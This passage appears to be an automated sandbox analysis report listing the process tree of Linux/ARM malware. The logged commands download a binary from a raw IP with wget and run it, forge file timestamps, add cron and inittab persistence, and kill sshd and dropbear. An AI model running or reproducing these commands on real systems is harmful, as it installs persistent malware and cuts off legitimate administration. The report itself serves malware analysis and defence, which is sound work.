    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: sh PID: 5067 Parent PID: 5064

    General

    Start time:05:27:11
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: cat PID: 5067 Parent PID: 5064

    General

    Start time:05:27:11
    Start date:25/03/2021
    Path:/bin/cat
    Arguments:cat /tmp/.xs/*.pid
    File size:52080 bytes
    MD5 hash:efa10d52f37361f2e3a5d22742f0fcc4

    Analysis Process: pty PID: 5068 Parent PID: 4831

    General

    Start time:05:27:11
    Start date:25/03/2021
    Path:./pty
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: sh PID: 5068 Parent PID: 4831

    General

    Start time:05:27:11
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:sh -c "rm -rf /tmp/.xs/* > /dev/null 2>&1 &"
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: sh PID: 5078 Parent PID: 5068

    General

    Start time:05:27:11
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: rm PID: 5078 Parent PID: 5068

    General

    Start time:05:27:11
    Start date:25/03/2021
    Path:/bin/rm
    Arguments:rm -rf /tmp/.xs/*
    File size:60272 bytes
    MD5 hash:b79876063d894c449856cca508ecca7f

    Analysis Process: pty PID: 5082 Parent PID: 4831

    General

    Start time:05:27:11
    Start date:25/03/2021
    Path:./pty
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: sh PID: 5082 Parent PID: 4831

    General

    Start time:05:27:11
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:sh -c "chmod 700 /tmp/pty > /dev/null 2>&1 &"
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: sh PID: 5093 Parent PID: 5082

    General

    Start time:05:27:11
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: chmod PID: 5093 Parent PID: 5082

    General

    Start time:05:27:11
    Start date:25/03/2021
    Path:/bin/chmod
    Arguments:chmod 700 /tmp/pty
    File size:56112 bytes
    MD5 hash:32c8c7318223ebc5b934a78cfc153d6f

    Analysis Process: pty PID: 5098 Parent PID: 4831

    General

    Start time:05:27:11
    Start date:25/03/2021
    Path:./pty
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: sh PID: 5098 Parent PID: 4831

    General

    Start time:05:27:11
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:sh -c "touch -acmr /bin/ls /tmp/pty"
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: sh PID: 5108 Parent PID: 5098

    General

    Start time:05:27:11
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: touch PID: 5108 Parent PID: 5098

    General

    Start time:05:27:11
    Start date:25/03/2021
    Path:/usr/bin/touch
    Arguments:touch -acmr /bin/ls /tmp/pty
    File size:10 bytes
    MD5 hash:1f168f69957c0fffbdd62556ad215f3c

    Analysis Process: pty PID: 5125 Parent PID: 4831

    General

    Start time:05:27:11
    Start date:25/03/2021
    Path:./pty
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: sh PID: 5125 Parent PID: 4831

    General

    Start time:05:27:11
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:sh -c "(crontab -l | grep -v \"/tmp/pty\" | grep -v \"no cron\" | grep -v \"lesshts/run.sh\" > /var/run/.x001804289383) > /dev/null 2>&1"
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: sh PID: 5141 Parent PID: 5125

    General

    Start time:05:27:12
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: sh PID: 5149 Parent PID: 5141

    General

    Start time:05:27:12
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: crontab PID: 5149 Parent PID: 5141

    General

    Start time:05:27:12
    Start date:25/03/2021
    Path:/usr/bin/crontab
    Arguments:crontab -l
    File size:36080 bytes
    MD5 hash:ff68fd30f0037fd7e9c1fdf5a035f739

    Analysis Process: sh PID: 5152 Parent PID: 5141

    General

    Start time:05:27:12
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: grep PID: 5152 Parent PID: 5141

    General

    Start time:05:27:12
    Start date:25/03/2021
    Path:/bin/grep
    Arguments:grep -v /tmp/pty
    File size:211224 bytes
    MD5 hash:fc9b0a0ff848b35b3716768695bf2427

    Analysis Process: sh PID: 5154 Parent PID: 5141

    General

    Start time:05:27:12
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: grep PID: 5154 Parent PID: 5141

    General

    Start time:05:27:12
    Start date:25/03/2021
    Path:/bin/grep
    Arguments:grep -v "no cron"
    File size:211224 bytes
    MD5 hash:fc9b0a0ff848b35b3716768695bf2427

    Analysis Process: sh PID: 5156 Parent PID: 5141

    General

    Start time:05:27:12
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: grep PID: 5156 Parent PID: 5141

    General

    Start time:05:27:12
    Start date:25/03/2021
    Path:/bin/grep
    Arguments:grep -v lesshts/run.sh
    File size:211224 bytes
    MD5 hash:fc9b0a0ff848b35b3716768695bf2427

    Analysis Process: pty PID: 5199 Parent PID: 4831

    General

    Start time:05:27:12
    Start date:25/03/2021
    Path:./pty
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: sh PID: 5199 Parent PID: 4831

    General

    Start time:05:27:12
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:sh -c "echo \"* * * * * /tmp/pty > /dev/null 2>&1 &\" >> /var/run/.x001804289383"
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: pty PID: 5205 Parent PID: 4831

    General

    Start time:05:27:12
    Start date:25/03/2021
    Path:./pty
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: sh PID: 5205 Parent PID: 4831

    General

    Start time:05:27:12
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:sh -c "crontab /var/run/.x001804289383"
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: sh PID: 5209 Parent PID: 5205

    General

    Start time:05:27:12
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: crontab PID: 5209 Parent PID: 5205

    General

    Start time:05:27:12
    Start date:25/03/2021
    Path:/usr/bin/crontab
    Arguments:crontab /var/run/.x001804289383
    File size:36080 bytes
    MD5 hash:ff68fd30f0037fd7e9c1fdf5a035f739

    Analysis Process: pty PID: 5226 Parent PID: 4831

    General

    Start time:05:27:12
    Start date:25/03/2021
    Path:./pty
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: sh PID: 5226 Parent PID: 4831

    General

    Start time:05:27:12
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:sh -c "rm -rf /var/run/.x001804289383"
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: sh PID: 5227 Parent PID: 5226

    General

    Start time:05:27:12
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: rm PID: 5227 Parent PID: 5226

    General

    Start time:05:27:12
    Start date:25/03/2021
    Path:/bin/rm
    Arguments:rm -rf /var/run/.x001804289383
    File size:60272 bytes
    MD5 hash:b79876063d894c449856cca508ecca7f

    Analysis Process: pty PID: 5233 Parent PID: 4831

    General

    Start time:05:27:12
    Start date:25/03/2021
    Path:./pty
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: sh PID: 5233 Parent PID: 4831

    General

    Start time:05:27:12
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:sh -c "/bin/uname -n"
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: sh PID: 5243 Parent PID: 5233

    General

    Start time:05:27:12
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: uname PID: 5243 Parent PID: 5233

    General

    Start time:05:27:12
    Start date:25/03/2021
    Path:/bin/uname
    Arguments:/bin/uname -n
    File size:31440 bytes
    MD5 hash:1078d9dca4e90919f7b2433cae105008

    Analysis Process: pty PID: 5262 Parent PID: 4831

    General

    Start time:05:27:12
    Start date:25/03/2021
    Path:./pty
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: sh PID: 5262 Parent PID: 4831

    General

    Start time:05:27:12
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:sh -c "/bin/uname -n"
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: sh PID: 5268 Parent PID: 5262

    General

    Start time:05:27:12
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: uname PID: 5268 Parent PID: 5262

    General

    Start time:05:27:12
    Start date:25/03/2021
    Path:/bin/uname
    Arguments:/bin/uname -n
    File size:31440 bytes
    MD5 hash:1078d9dca4e90919f7b2433cae105008

    Analysis Process: pty PID: 8335 Parent PID: 4831

    General

    Start time:05:30:03
    Start date:25/03/2021
    Path:./pty
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: pty PID: 8336 Parent PID: 8335

    General

    Start time:05:30:03
    Start date:25/03/2021
    Path:./pty
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: sh PID: 8336 Parent PID: 8335

    General

    Start time:05:30:03
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:sh -c "export PATH=/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin;( kill -9 `cat /var/run/dropbear.pid` `cat /var/run/sshd.pid` ; killall -9 sshd dropbear ; kill -9 `pidof sshd` `pidof dropbear` )>/dev/null 2>&1 & "
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: sh PID: 8337 Parent PID: 8336

    General

    Start time:05:30:03
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: sh PID: 8338 Parent PID: 8337

    General

    Start time:05:30:03
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: cat PID: 8338 Parent PID: 8337

    General

    Start time:05:30:03
    Start date:25/03/2021
    Path:/bin/cat
    Arguments:cat /var/run/dropbear.pid
    File size:52080 bytes
    MD5 hash:efa10d52f37361f2e3a5d22742f0fcc4

    Analysis Process: sh PID: 8339 Parent PID: 8337

    General

    Start time:05:30:03
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: cat PID: 8339 Parent PID: 8337

    General

    Start time:05:30:03
    Start date:25/03/2021
    Path:/bin/cat
    Arguments:cat /var/run/sshd.pid
    File size:52080 bytes
    MD5 hash:efa10d52f37361f2e3a5d22742f0fcc4

    Analysis Process: sh PID: 8340 Parent PID: 8337

    General

    Start time:05:30:03
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: killall PID: 8340 Parent PID: 8337

    General

    Start time:05:30:03
    Start date:25/03/2021
    Path:/usr/bin/killall
    Arguments:killall -9 sshd dropbear
    File size:23736 bytes
    MD5 hash:df59c8b62bfcf5b3bd7feaaa2295a9f7

    Analysis Process: sh PID: 8373 Parent PID: 8337

    General

    Start time:05:30:03
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: pidof PID: 8373 Parent PID: 8337

    General

    Start time:05:30:03
    Start date:25/03/2021
    Path:/bin/pidof
    Arguments:pidof sshd
    File size:14 bytes
    MD5 hash:1927a3fb9f656f7b53b72c92cbbecfe9

    Analysis Process: sh PID: 8382 Parent PID: 8337

    General

    Start time:05:30:04
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: pidof PID: 8382 Parent PID: 8337

    General

    Start time:05:30:04
    Start date:25/03/2021
    Path:/bin/pidof
    Arguments:pidof dropbear
    File size:14 bytes
    MD5 hash:1927a3fb9f656f7b53b72c92cbbecfe9

    Analysis Process: sh PID: 4830 Parent PID: 4580

    General

    Start time:05:27:11
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: wget PID: 4830 Parent PID: 4580

    General

    Start time:05:27:11
    Start date:25/03/2021
    Path:/usr/bin/wget
    Arguments:wget http://71.127.148.69/.x/irq0 -O irq0
    File size:474656 bytes
    MD5 hash:458ce58ac4b1aac3eafc287fa46bf92d

    Analysis Process: sh PID: 5280 Parent PID: 4580

    General

    Start time:05:27:14
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: chmod PID: 5280 Parent PID: 4580

    General

    Start time:05:27:14
    Start date:25/03/2021
    Path:/bin/chmod
    Arguments:chmod +x irq0
    File size:56112 bytes
    MD5 hash:32c8c7318223ebc5b934a78cfc153d6f

    Analysis Process: sh PID: 5281 Parent PID: 4580

    General

    Start time:05:27:14
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: chmod PID: 5281 Parent PID: 4580

    General

    Start time:05:27:14
    Start date:25/03/2021
    Path:/bin/chmod
    Arguments:chmod 700 irq0
    File size:56112 bytes
    MD5 hash:32c8c7318223ebc5b934a78cfc153d6f

    Analysis Process: sh PID: 5282 Parent PID: 4580

    General

    Start time:05:27:14
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: irq0 PID: 5282 Parent PID: 4580

    General

    Start time:05:27:14
    Start date:25/03/2021
    Path:./irq0
    Arguments:/usr/bin/qemu-arm ./irq0
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq0 PID: 5317 Parent PID: 5282

    General

    Start time:05:27:14
    Start date:25/03/2021
    Path:./irq0
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: sh PID: 5317 Parent PID: 5282

    General

    Start time:05:27:14
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:sh -c "chmod 700 /tmp/irq0 > /dev/null 2>&1 &"
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: sh PID: 5319 Parent PID: 5317

    General

    Start time:05:27:14
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: chmod PID: 5319 Parent PID: 5317

    General

    Start time:05:27:14
    Start date:25/03/2021
    Path:/bin/chmod
    Arguments:chmod 700 /tmp/irq0
    File size:56112 bytes
    MD5 hash:32c8c7318223ebc5b934a78cfc153d6f

    Analysis Process: irq0 PID: 5320 Parent PID: 5282

    General

    Start time:05:27:14
    Start date:25/03/2021
    Path:./irq0
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: sh PID: 5320 Parent PID: 5282

    General

    Start time:05:27:14
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:sh -c "touch -acmr /bin/ls /tmp/irq0"
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: sh PID: 5322 Parent PID: 5320

    General

    Start time:05:27:14
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: touch PID: 5322 Parent PID: 5320

    General

    Start time:05:27:14
    Start date:25/03/2021
    Path:/usr/bin/touch
    Arguments:touch -acmr /bin/ls /tmp/irq0
    File size:10 bytes
    MD5 hash:1f168f69957c0fffbdd62556ad215f3c

    Analysis Process: irq0 PID: 5323 Parent PID: 5282

    General

    Start time:05:27:14
    Start date:25/03/2021
    Path:./irq0
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: sh PID: 5323 Parent PID: 5282

    General

    Start time:05:27:14
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:sh -c "(crontab -l | grep -v \"/tmp/irq0\" | grep -v \"no cron\" | grep -v \"lesshts/run.sh\" > /var/run/.x00740882966) > /dev/null 2>&1"
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: sh PID: 5325 Parent PID: 5323

    General

    Start time:05:27:14
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: sh PID: 5326 Parent PID: 5325

    General

    Start time:05:27:14
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: crontab PID: 5326 Parent PID: 5325

    General

    Start time:05:27:14
    Start date:25/03/2021
    Path:/usr/bin/crontab
    Arguments:crontab -l
    File size:36080 bytes
    MD5 hash:ff68fd30f0037fd7e9c1fdf5a035f739

    Analysis Process: sh PID: 5327 Parent PID: 5325

    General

    Start time:05:27:14
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: grep PID: 5327 Parent PID: 5325

    General

    Start time:05:27:14
    Start date:25/03/2021
    Path:/bin/grep
    Arguments:grep -v /tmp/irq0
    File size:211224 bytes
    MD5 hash:fc9b0a0ff848b35b3716768695bf2427

    Analysis Process: sh PID: 5328 Parent PID: 5325

    General

    Start time:05:27:14
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: grep PID: 5328 Parent PID: 5325

    General

    Start time:05:27:14
    Start date:25/03/2021
    Path:/bin/grep
    Arguments:grep -v "no cron"
    File size:211224 bytes
    MD5 hash:fc9b0a0ff848b35b3716768695bf2427

    Analysis Process: sh PID: 5329 Parent PID: 5325

    General

    Start time:05:27:14
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: grep PID: 5329 Parent PID: 5325

    General

    Start time:05:27:14
    Start date:25/03/2021
    Path:/bin/grep
    Arguments:grep -v lesshts/run.sh
    File size:211224 bytes
    MD5 hash:fc9b0a0ff848b35b3716768695bf2427

    Analysis Process: irq0 PID: 5345 Parent PID: 5282

    General

    Start time:05:27:14
    Start date:25/03/2021
    Path:./irq0
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: sh PID: 5345 Parent PID: 5282

    General

    Start time:05:27:14
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:sh -c "echo \"* * * * * /tmp/irq0 > /dev/null 2>&1 &\" >> /var/run/.x00740882966"
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: irq0 PID: 5404 Parent PID: 5282

    General

    Start time:05:27:14
    Start date:25/03/2021
    Path:./irq0
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: sh PID: 5404 Parent PID: 5282

    General

    Start time:05:27:14
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:sh -c "crontab /var/run/.x00740882966"
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: sh PID: 5414 Parent PID: 5404

    General

    Start time:05:27:14
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: crontab PID: 5414 Parent PID: 5404

    General

    Start time:05:27:14
    Start date:25/03/2021
    Path:/usr/bin/crontab
    Arguments:crontab /var/run/.x00740882966
    File size:36080 bytes
    MD5 hash:ff68fd30f0037fd7e9c1fdf5a035f739

    Analysis Process: irq0 PID: 5415 Parent PID: 5282

    General

    Start time:05:27:14
    Start date:25/03/2021
    Path:./irq0
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: sh PID: 5415 Parent PID: 5282

    General

    Start time:05:27:14
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:sh -c "rm -rf /var/run/.x00740882966"
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: sh PID: 5437 Parent PID: 5415

    General

    Start time:05:27:14
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: rm PID: 5437 Parent PID: 5415

    General

    Start time:05:27:14
    Start date:25/03/2021
    Path:/bin/rm
    Arguments:rm -rf /var/run/.x00740882966
    File size:60272 bytes
    MD5 hash:b79876063d894c449856cca508ecca7f

    Analysis Process: irq0 PID: 5438 Parent PID: 5282

    General

    Start time:05:27:14
    Start date:25/03/2021
    Path:./irq0
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: sh PID: 5438 Parent PID: 5282

    General

    Start time:05:27:14
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:sh -c "cat /etc/inittab | grep -v \"/tmp/irq0\" > /etc/inittab2"
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: sh PID: 5440 Parent PID: 5438

    General

    Start time:05:27:14
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: cat PID: 5440 Parent PID: 5438

    General

    Start time:05:27:14
    Start date:25/03/2021
    Path:/bin/cat
    Arguments:cat /etc/inittab
    File size:52080 bytes
    MD5 hash:efa10d52f37361f2e3a5d22742f0fcc4

    Analysis Process: sh PID: 5441 Parent PID: 5438

    General

    Start time:05:27:14
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: grep PID: 5441 Parent PID: 5438

    General

    Start time:05:27:14
    Start date:25/03/2021
    Path:/bin/grep
    Arguments:grep -v /tmp/irq0
    File size:211224 bytes
    MD5 hash:fc9b0a0ff848b35b3716768695bf2427

    Analysis Process: irq0 PID: 5478 Parent PID: 5282

    General

    Start time:05:27:14
    Start date:25/03/2021
    Path:./irq0
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: sh PID: 5478 Parent PID: 5282

    General

    Start time:05:27:14
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:sh -c "echo \"0:2345:respawn:/tmp/irq0\" >> /etc/inittab2"
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: irq0 PID: 5480 Parent PID: 5282

    General

    Start time:05:27:14
    Start date:25/03/2021
    Path:./irq0
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: sh PID: 5480 Parent PID: 5282

    General

    Start time:05:27:14
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:sh -c "cat /etc/inittab2 > /etc/inittab"
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: sh PID: 5482 Parent PID: 5480

    General

    Start time:05:27:14
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: cat PID: 5482 Parent PID: 5480

    General

    Start time:05:27:14
    Start date:25/03/2021
    Path:/bin/cat
    Arguments:cat /etc/inittab2
    File size:52080 bytes
    MD5 hash:efa10d52f37361f2e3a5d22742f0fcc4

    Analysis Process: irq0 PID: 5483 Parent PID: 5282

    General

    Start time:05:27:14
    Start date:25/03/2021
    Path:./irq0
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: sh PID: 5483 Parent PID: 5282

    General

    Start time:05:27:14
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:sh -c "rm -rf /etc/inittab2"
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: sh PID: 5485 Parent PID: 5483

    General

    Start time:05:27:14
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: rm PID: 5485 Parent PID: 5483

    General

    Start time:05:27:14
    Start date:25/03/2021
    Path:/bin/rm
    Arguments:rm -rf /etc/inittab2
    File size:60272 bytes
    MD5 hash:b79876063d894c449856cca508ecca7f

    Analysis Process: irq0 PID: 5489 Parent PID: 5282

    General

    Start time:05:27:14
    Start date:25/03/2021
    Path:./irq0
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: sh PID: 5489 Parent PID: 5282

    General

    Start time:05:27:14
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:sh -c "touch -acmr /bin/ls /etc/inittab"
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: sh PID: 5514 Parent PID: 5489

    General

    Start time:05:27:14
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: touch PID: 5514 Parent PID: 5489

    General

    Start time:05:27:14
    Start date:25/03/2021
    Path:/usr/bin/touch
    Arguments:touch -acmr /bin/ls /etc/inittab
    File size:10 bytes
    MD5 hash:1f168f69957c0fffbdd62556ad215f3c

    Analysis Process: irq0 PID: 5545 Parent PID: 5282

    General

    Start time:05:27:14
    Start date:25/03/2021
    Path:./irq0
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq0 PID: 5547 Parent PID: 5545

    General

    Start time:05:27:14
    Start date:25/03/2021
    Path:./irq0
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: sh PID: 5547 Parent PID: 5545

    General

    Start time:05:27:14
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:sh -c "/bin/uname -n"
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: sh PID: 5549 Parent PID: 5547

    General

    Start time:05:27:14
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: uname PID: 5549 Parent PID: 5547

    General

    Start time:05:27:14
    Start date:25/03/2021
    Path:/bin/uname
    Arguments:/bin/uname -n
    File size:31440 bytes
    MD5 hash:1078d9dca4e90919f7b2433cae105008

    Analysis Process: irq0 PID: 5550 Parent PID: 5545

    General

    Start time:05:27:14
    Start date:25/03/2021
    Path:./irq0
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: sh PID: 5550 Parent PID: 5545

    General

    Start time:05:27:14
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:sh -c "/bin/uname -n"
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: sh PID: 5552 Parent PID: 5550

    General

    Start time:05:27:14
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: uname PID: 5552 Parent PID: 5550

    General

    Start time:05:27:14
    Start date:25/03/2021
    Path:/bin/uname
    Arguments:/bin/uname -n
    File size:31440 bytes
    MD5 hash:1078d9dca4e90919f7b2433cae105008

    Analysis Process: irq0 PID: 5553 Parent PID: 5545

    General

    Start time:05:27:14
    Start date:25/03/2021
    Path:./irq0
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: sh PID: 5553 Parent PID: 5545

    General

    Start time:05:27:14
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:sh -c "/bin/uname -n"
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: sh PID: 5591 Parent PID: 5553

    General

